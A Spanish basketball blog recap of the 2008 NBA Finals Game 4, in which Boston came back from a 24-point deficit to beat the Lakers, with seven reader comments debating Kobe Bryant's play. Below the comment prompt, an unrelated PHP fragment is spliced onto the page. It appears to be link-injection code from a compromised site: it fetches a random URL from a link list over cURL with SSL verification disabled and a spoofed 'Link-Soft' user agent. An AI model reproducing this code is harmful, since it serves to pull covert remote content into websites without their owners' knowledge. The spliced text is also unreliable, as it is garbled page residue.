Contra las cuerdas (Lakers 91 – Celtics 97)

14 de June de 2008 por TheDeerHunter

Nunca antes de anoche, y se dice pronto, un equipo había sacado a otro una diferencia de 21 puntos en el primer cuarto de un partido de la final. En esta situación pocos podían imaginarse el desenlace final del apasionante partido de anoche.

Los Lakers, en esta ocasión con Odom a la cabeza, barrieron de la pista a Celtics en un inicio arrollador. Todo salía perfecto. Odom no fallaba ni una, Gasol mostraba intensidad y acierto y hasta Radmanovic anotaba sus tiros. Kobe no estaba muy activo de cara al aro pero sí complementaba bien a su equipo, esta vez desde una función más secundaria. En defensa se movían rápido en las ayudas y llegaban bien a los tiros. Con Garnett con problemas de faltas y el resto de las estrellas verdes desaparecidas todo parecía indicar que se produciría una debacle.

Sin embargo, como en otras ocasiones durante esta temporada, ya iniciado el segundo cuarto los amarillos comenzaron a mostrar ciertos signos negativos. No sabemos si llegado este punto se trataba de dosificar fuerzas o era más exceso de confianza o peor aún, falta de concentración. El caso es que cuando los Celtics estaban en su peor momento, en lugar de aplastarlos definitivamente, una larga sucesión de errores tontos junto a aciertos puntuales de los verdes liderados por un increíble Posey, les metían otra vez en el partido. Como también en otras ocasiones, los Lakers subían un peldaño de tensión y volvían a poner tierra de por medio, con un gran 2+1 de Gasol y un triple postrero de Farmar.
Cualquier equipo hubiera bajado los brazos ante tal reacción y ante las dificultades de perder por problemas físicos a dos titulares como Kedrick Perkins y Rondo. Pero en esta ocasión los Celtics se vieron beneficiados por el colchón de ventaja con la que todavía contaban en la eliminatoria para no perder los nervios, y al mismo tiempo sus rivales transmitían extrañas sensaciones que invitaban a buscar la proeza.

Así que salieron en la segunda parte con la intención de dar guerra… aunque sin creérselo demasiado. Un quinteto definido para la sorpresa: House, Allen, Pierce, Posey y Kevin Garnett. Defensa a muerte y mucho tiro exterior casi en ausencia de juego interior.
Ante este simple recurso, los Lakers se fundieron. Los ataques se atascaban buscando la ventaja interior. Kobe no reaccionaba y se le notaba falto de chispa y de ideas. Cuando lograba encontrar a Gasol u Odom estos fallaban estrepitosamente. Farmar, Vujacic, Turiaf… toda la segunda unidad paupérrima y Phil Jackson dejaba pasar los minutos confiado todavía en las estelares manos de Kobe y en la reacción de sus pupilos. La defensa no lograba detener ni el tiro de los 4 exteriores ni las jugadas aisladas del, hasta ahora desaparecido Garnett. Pérdidas de balones, jugadas absurdas, fallos clamorosos. Miradas de miedo y expresiones de vacío físico. Los Celtics se encontraron de repente el partido en sus manos y machacaron a los locales sin piedad ante la pasiva mirada de su propio público. Parcial de 31-15 en el tercero y el partido comenzaba de nuevo, pero con dinámicas opuestas entre unos y otros.

Los Celtics, pusieron cabeza donde los Lakers sólo ponían corazón. Se olvidaron de todos sus sistemas y otra vez más se pusieron en manos del 24. Por un momento pareció que lo volverían a lograr, pero no. No era su noche. Sin hacer nada del otro mundo, Boston dejó que se devoraran ellos mismos en sus propios nervios y lo único que lograron los locales fue poner emoción y dramatismo a un partido que ya estaba decidido.
Nunca nadie había remontado una desventaja de más de 15 puntos tras el primer cuarto de un partido de la final. Alguna vez tenía que ser la primera.

Pocos apuestan ahora en que Los Angeles podrán ganar 3 partidos seguidos, dos de ellos en el fortín de Boston. Ahora, lo único que les queda a los amarillos es tratar de recuperarse psicológicamente de este golpazo para evitar la derrota final en el próximo. De momento, con eso, ya les iría bien. Trabajo tienen por delante y poco tiempo para lograrlo.

Comenta

7 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    En el segundo cuarto ganaban de 24. (45-21)

      Citar

  2. Viva_Dirk dice:
    #2

    Absoluta decepción, con Odom y Gasol ganando una ventaja de 20, madurando el partido en la primera mitad como durante todos los lay-offs, esta vez Kobe no fue capaz de cerrar el partido, ha bajado su nivel en el peor momento.

    Creo que ahora mismo está la cosa al 90% para Boston, pero oye, si ganamos el 5º…..¿será la ilusión?

      Citar

  3. TheDeerHunter dice:
    #3

    Kobe estuvo mal, sobre todo en la segunda

    Pero Gasol y Odom también se escondieron en ese momento… y lo peor aún, cuando les llegó el balón a ellos fallaron estrepitosamente, como todos…

    No se trata de si Kobe hizo esto o lo otro, como líder que es su responsabilidad es mayor, pero ninguno le ayudó en el peor momento, todo lo contrario.
    De todas formas ahora mismo tampoco hay que darle muchas vueltas. A ganar el 5º y a por ellos. Ya no hay nada más que perder.

      Citar

  4. Viva_Dirk dice:
    #4

    En la 2ª parte Kobe tiró mucho y mal, Gasol recibió pocas y sacó un rendimiento mas o menos aceptable y Odom apenas tuvo acciones claras para el; era el momento de Kobe como habia sido durante todos los play-offs y en esta ocasión el no respondió. Buscar que el resto no hizo nada por ayudarle no me parece acertado cuando en todas las segundas partes de estos play-offs el que ha decidido si anotar el o crear espacios para el resto ha sido siempre Kobe. No hay que buscar excusas en los demás que cuando no han cumplido con lo suyo les hemos criticado a ellos y no hemos dicho que si Kobe nosequé.

      Citar

  5. TheDeerHunter dice:
    #5

    Viva, sin ánimo de ofender tus comentarios sobre Bryant rozan lo obsesivo.

    En mi caso, te equivocas de pleno, porque no mantengo especial simpatía por él… más bien tirando hacia todo lo contrario (aunque me parece un superclase como jugador) y desde luego no soy partidista en cuanto a mis comentarios hacia él se refieren.
    En cuanto a tu visión… empiezo a sospechar que quien más se deja influenciar por la subjetividad no soy precísamente yo 😉

    No puedo decir más de lo que ya he dicho, me pareció que Kobe jugó mal… pero cuando le llegó el balón a Gasol y Odom lo hicieron todavía peor… y además los vi borrándose, a diferencia del 24.
    Me recuerda a la final del Europeo… tantos palos para Gasol, cuando era el único que mostraba un par…
    En cualquier caso no creo que aquí nadie haya evitado criticar a Kobe como sugieres.

    En definitiva, me parece bien que compartas tu punto de vista. Yo en cualquier crónica que escriba únicamente puedo plasmar el mío.

      Citar

  6. Viva_Dirk dice:
    #6

    No tengo ninguna obsesión por criticar a Kobe, es mas, a mi si me cae bien. Pero no me podrás negar que durante todos los play-offs los Lakers han jugado las primeras mitades mucho a involucrar a todos y en las segundas se jugaba mas para que Kobe matara el partido, y eso solo ha sido capaz de hacerlo en el 3º.

    Y lo de evitar las críticas es que cuando ganamos gracias a el hay fuegos de artificio y cuando es el mayor culpable de la derrota parece que no se puede decir mas que ‘jugó mal’, siempre poniendo el pero de que los compañeros se escondieron.

      Citar

  7. TheDeerHunter dice:
    #7

    Estoy de acuerdo en tu apreciación sobre lo de las primeras/segundas partes de los partidos hasta ahora…

    no estoy de acuerdo con la conclusión de esa situación que haces o, al menos, me parece bastante discutible… y desde luego no estoy de acuerdo con lo de los fuegos de artificio. Al menos, ni es mi propósito ni lo percibo como tú lo haces.
    Lo tomo con que no se trata de una crítica velada. Simplemente no comparto tus comentarios. Tal y como entiendo los partidos escribo los análisis. Sin artificios de ningún tipo.

    En ese sentido yo no he visto esa culpabilidad suprema de Kobe en las derrotas, como tampoco soy muy dado a señalar a la gente con el dedo inquisidor pues parto de la base de que los rivales también juegan y saben jugar a esto.
    Como a dicho Gallis alguna vez. Si yo fuera Kobe es posible que no hubiera terminado alguno de estos partidos… puede que incluso por agredir a alguno de mis compañeros.

    PD: Odio a Radmanovic (para más señas)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>